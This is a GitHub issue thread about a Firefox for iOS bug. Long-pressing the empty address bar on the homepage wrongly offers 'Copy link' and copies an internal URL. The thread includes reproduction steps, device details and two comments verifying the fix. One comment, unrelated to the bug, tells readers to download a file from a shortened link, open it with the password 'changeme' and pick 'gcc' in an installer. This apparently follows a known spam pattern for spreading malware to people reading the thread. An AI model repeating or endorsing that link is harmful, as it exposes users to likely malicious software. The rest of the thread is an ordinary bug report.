### ISSUE TITLE
Option to Copy link should not be available when long tapping the address bar on  homepage

### ISSUE THREAD

**Issue by alinamoldovan84** [mozilla-mobile/firefox-ios#21642]
The issue reproduces in both: 'New Toolbar iOS' experiment is enabled or disabled 

## Steps to reproduce
1. Navigate to homepage 
2. Make sure the address bar is empty 
3. Long tap on the address bar 
4. Chose to copy the link 

### Expected behavior
Step 3: Nothing should happen. The option to copy the link should not be available

### Actual behavior
Step 3: The copy link option is available 
Step 4: internal://local/about/home#panel=0 link is passed

### Device & build information
* Device: iPhone 15+ (18.0); iPad 4th Gen (17.2) 
* Build version: v9000(44621) 
* First seen version: v127 
### Notes
Attachments: 

https://github.com/user-attachments/assets/5cbcf9bd-217a-40f7-a45c-e87d40f293cc
https://github.com/user-attachments/assets/7ca10099-643b-425f-bfc8-d524aeb79bdc

┆Issue is synchronized with this [Jira Task](https://mozilla-hub.atlassian.net/browse/FXIOS-9858)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by data-sync-user** [comment]
➤ Diana Andreea Barladeanu commented:

Verified as fixed on v9000 (45556), with iPhone 15 (17.5).

**Comment by data-sync-user** [comment]
➤ Diana Andreea Barladeanu commented:

Verified as fixed on v132 (46701), with iPhone 15 (17.6).
